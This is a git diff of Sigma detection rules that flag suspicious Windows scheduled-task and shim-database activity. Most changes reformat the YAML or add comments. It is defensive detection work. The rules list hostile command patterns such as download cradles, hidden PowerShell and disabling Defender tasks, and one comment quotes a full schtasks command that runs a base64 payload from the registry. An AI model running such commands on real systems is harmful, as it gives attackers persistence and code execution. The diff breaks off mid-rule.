b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml @@ -1,9 +1,7 @@ title: Delete All Scheduled Tasks id: 220457c1-1c9f-4c2e-afe6-9598926222c1 status: test -description: Detects the usage of schtasks with the delete flag and the asterisk symbol - to delete all tasks from the schedule of the local computer, including tasks scheduled - by other users. +description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /delete ' - /tn \* - ' /f' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml index a418aa890..e738fd5a0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_disable.yml @@ -1,11 +1,10 @@ title: Disable Important Scheduled Task id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 related: - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by disabling their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task - https://twitter.com/MichalKoczwara/status/1553634816016498688 @@ -26,11 +25,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational schtasks_exe: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Change - /TN - /disable - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml index e30a31368..6aef98ba0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks From Env Var Folder id: 81325ce1-be01-4250-944f-b4789644556f related: - - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 - type: derived + - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline + type: derived status: experimental -description: Detects Schtask creations that point to a suspicious folder or an environment - variable often used by malware +description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware references: - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/ - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 @@ -25,9 +24,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection1_create: Image|endswith: \schtasks.exe - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' selection1_all_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \AppData\Local\ @@ -38,43 +37,42 @@ detection: selection2_parent: ParentCommandLine|endswith: \svchost.exe -k netsvcs -p -s Schedule selection2_some_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \Users\Public - '%Public%' filter_mixed: - - CommandLine|contains: - - update_task.xml - - /Create /TN TVInstallRestore /TR - - ParentCommandLine|contains: unattended.ini + - CommandLine|contains: + - update_task.xml + - /Create /TN TVInstallRestore /TR + - ParentCommandLine|contains: unattended.ini filter_avira_install: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /Xml "C:\Users\ - \AppData\Local\Temp\.CR. - Avira_Security_Installation.xml filter_avira_other: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /F /TN - '/Xml ' - \AppData\Local\Temp\is- - Avira_ - CommandLine|contains: + CommandLine|contains: - .tmp\UpdateFallbackTask.xml - .tmp\WatchdogServiceControlManagerTimeout.xml - .tmp\SystrayAutostart.xml - .tmp\MaintenanceTask.xml filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Temp\ - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml - condition: process_creation and (( all of selection1* or all of selection2* ) - and not 1 of filter*) + condition: process_creation and (( all of selection1* or all of selection2* ) and not 1 of filter*) falsepositives: - - Benign scheduled tasks creations or executions that happen often during software - installations - - Software that uses the AppData folder and scheduled tasks to update the software - in the AppData folders + - Benign scheduled tasks creations or executions that happen often during software installations + - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml index 9d1e3f3d7..e24d7b9a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml @@ -1,8 +1,7 @@ title: Schtasks From Suspicious Folders id: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb status: test -description: Detects scheduled task creations that have suspicious action command - and folder combinations +description: Detects scheduled task creations that have suspicious action command and folder combinations references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical author: Florian Roth (Nextron Systems) @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_create: - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' selection_command: - CommandLine|contains: + CommandLine|contains: - powershell - pwsh - 'cmd /c ' @@ -35,7 +34,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_all_folders: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - '%ProgramData%' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml index 0ed2ca07e..eb525b1fb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml @@ -20,16 +20,18 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_img: Image|endswith: \schtasks.exe - CommandLine|contains: '/Create ' + CommandLine|contains: '/Create ' selection_tn: - CommandLine|contains: + CommandLine|contains: + # Can start with single or double quote - /TN "{ - /TN '{ - /TN { selection_end: - CommandLine|contains: + CommandLine|contains: + # Ending of the name to avoid possible FP in the rest of the commandline - '}"' - - '}''' + - "}'" - '} ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml index 32a20bfcc..d3ad51822 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml @@ -1,8 +1,7 @@ title: Uncommon One Time Only Scheduled Task At 00:00 id: 970823b7-273b-460a-8afc-3a6811998529 status: test -description: Detects scheduled task creation events that include suspicious actions, - and is run once at 00:00 +description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: pH-T (Nextron Systems) @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|contains: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - wscript - vbscript - cscript @@ -35,7 +34,7 @@ detection: - powershell - \AppData\ selection_time: - CommandLine|contains|all: + CommandLine|contains|all: - once - 00:00 condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml index 8548595dc..43f9946c8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_parent.yml @@ -1,8 +1,7 @@ title: Suspicious Add Scheduled Task Parent id: 9494479d-d994-40bf-a8b1-eea890237021 status: test -description: Detects suspicious scheduled task creations from a parent stored in a - temporary folder +description: Detects suspicious scheduled task creations from a parent stored in a temporary folder references: - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ author: Florian Roth (Nextron Systems) @@ -21,19 +20,18 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains: '/Create ' + CommandLine|contains: '/Create ' ParentImage|contains: - \AppData\Local\ - \AppData\Roaming\ - \Temporary Internet - \Users\Public\ filter: - CommandLine|contains: + CommandLine|contains: - update_task.xml - unattended.ini condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks + - Software installers that run from temporary folders and also install scheduled tasks level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml index 04029b645..91e0d764b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml @@ -1,16 +1,12 @@ title: Potential Persistence Via Microsoft Compatibility Appraiser id: f548a603-c9f2-4c89-b511-b089f7e94549 related: - - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 - type: derived + - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 + type: derived status: test -description: 'Detects manual execution of the "Microsoft Compatibility Appraiser" - task via schtasks. - - In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" - registry key. - - ' +description: | + Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. + In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman @@ -28,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'run ' - \Application Experience\Microsoft Compatibility Appraiser condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml index 75404cfca..cfbadb7f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml @@ -1,13 +1,10 @@ title: Potential Persistence Via Powershell Search Order Hijacking - Task id: b66474aa-bd92-4333-a16c-298155b120df related: - - id: 6e8811ee-90ba-441e-8486-5653e68b2299 - type: similar + - id: 6e8811ee-90ba-441e-8486-5653e68b2299 + type: similar status: test -description: Detects suspicious powershell execution via a schedule task where the - command ends with an suspicious flags to hide the powershell instance instead - of executeing scripts or commands. This could be a sign of persistence via PowerShell - "Get-Variable" technique as seen being used in Colibri Loader +description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader references: - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) @@ -31,7 +28,7 @@ detection: ParentCommandLine|contains|all: - -k netsvcs - -s Schedule - CommandLine|endswith: + CommandLine|endswith: - ' -windowstyle hidden' - ' -w hidden' - ' -ep bypass' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml index 97784abcd..10b252540 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml @@ -1,11 +1,10 @@ title: Scheduled Task Executing Payload from Registry id: 86588b36-c6d3-465f-9cee-8f9093e07798 related: - - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 - type: derived + - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 + type: derived status: experimental -description: Detects the creation of a schtasks that potentially executes a payload - stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -24,22 +23,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' - HKEY_ filter_main_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml index 5e8610117..f8bd1055f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml @@ -1,12 +1,10 @@ title: Scheduled Task Executing Encoded Payload from Registry id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 status: test -description: Detects the creation of a schtask that potentially executes a base64 - encoded payload stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ -author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), - Nasreddine Bencherchali (Nextron Systems) +author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022/02/12 modified: 2023/02/04 tags: @@ -23,20 +21,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + # schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30 + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: /Create + CommandLine|contains: /Create selection_cli_encoding: - CommandLine|contains: + CommandLine|contains: - FromBase64String - encodedcommand selection_cli_get: - CommandLine|contains: + CommandLine|contains: - Get-ItemProperty - - ' gp ' + - ' gp ' # Alias selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - 'HKCU:' - 'HKLM:' - 'registry::' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml index 5b9f3aed5..ae6dfd712 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Types id: 24c8392b-aa3c-46b7-a545-43f71657fe98 related: - - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a - type: similar + - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a + type: similar status: test -description: Detects scheduled task creations or modification on a suspicious schedule - type +description: Detects scheduled task creations or modification on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -24,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' filter_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml index d3055a601..86e315eea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks Schedule Type With High Privileges id: 7a02e22e-b885-4404-b38b-1ddc7e65258a related: - - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 - type: similar + - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 + type: similar status: test -description: Detects scheduled task creations or modification to be run with high - privileges on a suspicious schedule type +description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create @@ -23,22 +22,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_time: - CommandLine|contains: + CommandLine|contains: - ' ONLOGON ' - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' selection_privs: - CommandLine|contains: - - NT AUT - - ' SYSTEM' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - HIGHEST condition: process_creation and (all of selection_*) falsepositives: - - Some installers were seen using this method of creation unfortunately. Filter - them in your environment + - Some installers were seen using this method of creation unfortunately. Filter them in your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml index 77d7cee5a..0fe050dec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml @@ -1,9 +1,7 @@ title: Suspicious Scheduled Task Creation via Masqueraded XML File id: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c status: experimental -description: Detects the creation of a scheduled task using the "-XML" flag with a - file without the '.xml' extension. This behavior could be indicative of potential - defense evasion attempt during persistence +description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence references: - https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml- - https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml @@ -23,18 +21,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli_create: - CommandLine|contains: + CommandLine|contains: - /create - -create selection_cli_xml: - CommandLine|contains: + CommandLine|contains: - /xml - -xml filter_main_extension_xml: - CommandLine|contains: .xml + CommandLine|contains: .xml filter_main_system_process: IntegrityLevel: System filter_main_rundll32: @@ -44,13 +42,13 @@ detection: - .tmp,zzzzInvokeManagedCustomActionOutOfProc filter_optional_third_party: ParentImage|endswith: + # Consider removing any tools that you don't use to avoid blind spots - :\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe - :\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe - :\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe - :\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe - :\Program Files\Dell\SupportAssist\pcdrcui.exe - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml index dc83543e2..484795f1d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml @@ -1,8 +1,7 @@ title: Suspicious Command Patterns In Scheduled Task Creation id: f2c64357-b1d2-41b7-849f-34d2682c0fad status: experimental -description: Detects scheduled task creation using "schtasks" that contain potentially - suspicious or uncommon commands +description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands references: - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/ - https://twitter.com/RedDrip7/status/1506480588827467785 @@ -23,13 +22,13 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_schtasks: Image|endswith: \schtasks.exe - CommandLine|contains: '/Create ' + CommandLine|contains: '/Create ' selection_pattern_1: - CommandLine|contains: + CommandLine|contains: - '/sc minute ' - '/ru system ' selection_pattern_2: - CommandLine|contains: + CommandLine|contains: - cmd /c - cmd /k - cmd /r @@ -37,7 +36,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_uncommon: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -enc ' - ' -w hidden ' @@ -46,26 +45,24 @@ detection: - .DownloadData - .DownloadFile - .DownloadString - - '/c start /min ' + - '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785 - FromBase64String - mshta http - mshta.exe http selection_anomaly_1: - CommandLine|contains: + CommandLine|contains: - :\Windows\Temp\ - \AppData\ - '%AppData%' - '%Temp%' - '%tmp%' selection_anomaly_2: - CommandLine|contains: + CommandLine|contains: - cscript - curl - wscript - condition: process_creation and (selection_schtasks and ( all of selection_pattern_* - or selection_uncommon or all of selection_anomaly_* )) + condition: process_creation and (selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks are expected to generate some false positives + - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml index cf1350dbe..0793e953b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_system.yml @@ -1,8 +1,7 @@ title: Schtasks Creation Or Modification With SYSTEM Privileges id: 89ca78fd-b37c-4310-b3d3-81a023f83936 status: experimental -description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" - privileges +description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges references: - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -23,22 +22,27 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_root: Image|endswith: \schtasks.exe - CommandLine|contains: + CommandLine|contains: - ' /change ' - ' /create ' selection_run: - CommandLine|contains: '/ru ' + CommandLine|contains: '/ru ' selection_user: - CommandLine|contains: - - NT AUT - - ' SYSTEM ' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space filter_optional_teamviewer: + # FP from test set in SIGMA + # Cannot use ParentImage on all OSes for 4688 events + # ParentImage|contains|all: + # - '\AppData\Local\Temp\' + # - 'TeamViewer_.exe' Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /TN TVInstallRestore - \TeamViewer_.exe filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR ' - :\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe - /VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml index ad531f329..2d688e3bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml @@ -1,15 +1,12 @@ title: Potential Shim Database Persistence via Sdbinst.EXE id: 517490a7-115a-48c6-8862-1a481504d5a8 related: - - id: 18ee686c-38a3-4f65-9f44-48a077141f42 - type: similar + - id: 18ee686c-38a3-4f65-9f44-48a077141f42 + type: similar status: test -description: 'Detects installation of a new shim using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a new shim using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence author: Markus Neis @@ -28,13 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - Image|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe selection_cli: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_optional_iis: ParentImage|endswith: \msiexec.exe - CommandLine|contains: + CommandLine|contains: + # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120) - :\Program Files (x86)\IIS Express\iisexpressshim.sdb - :\Program Files\IIS Express\iisexpressshim.sdb condition: process_creation and (all of selection_* and not 1 of filter_optional_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml index 5f160f348..a85920ea5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml @@ -1,16 +1,12 @@ title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE id: 18ee686c-38a3-4f65-9f44-48a077141f42 related: - - id: 517490a7-115a-48c6-8862-1a481504d5a8 - type: derived + - id: 517490a7-115a-48c6-8862-1a481504d5a8 + type: derived status: test -description: 'Detects installation of a potentially suspicious new shim with an uncommon - extension using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md @@ -30,21 +26,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - Image|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe filter_main_legit_ext: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_main_svchost: - - CommandLine|endswith: - - ' -c' - - ' -f' - - ' -mm' - - ' -t' - - CommandLine|contains: ' -m 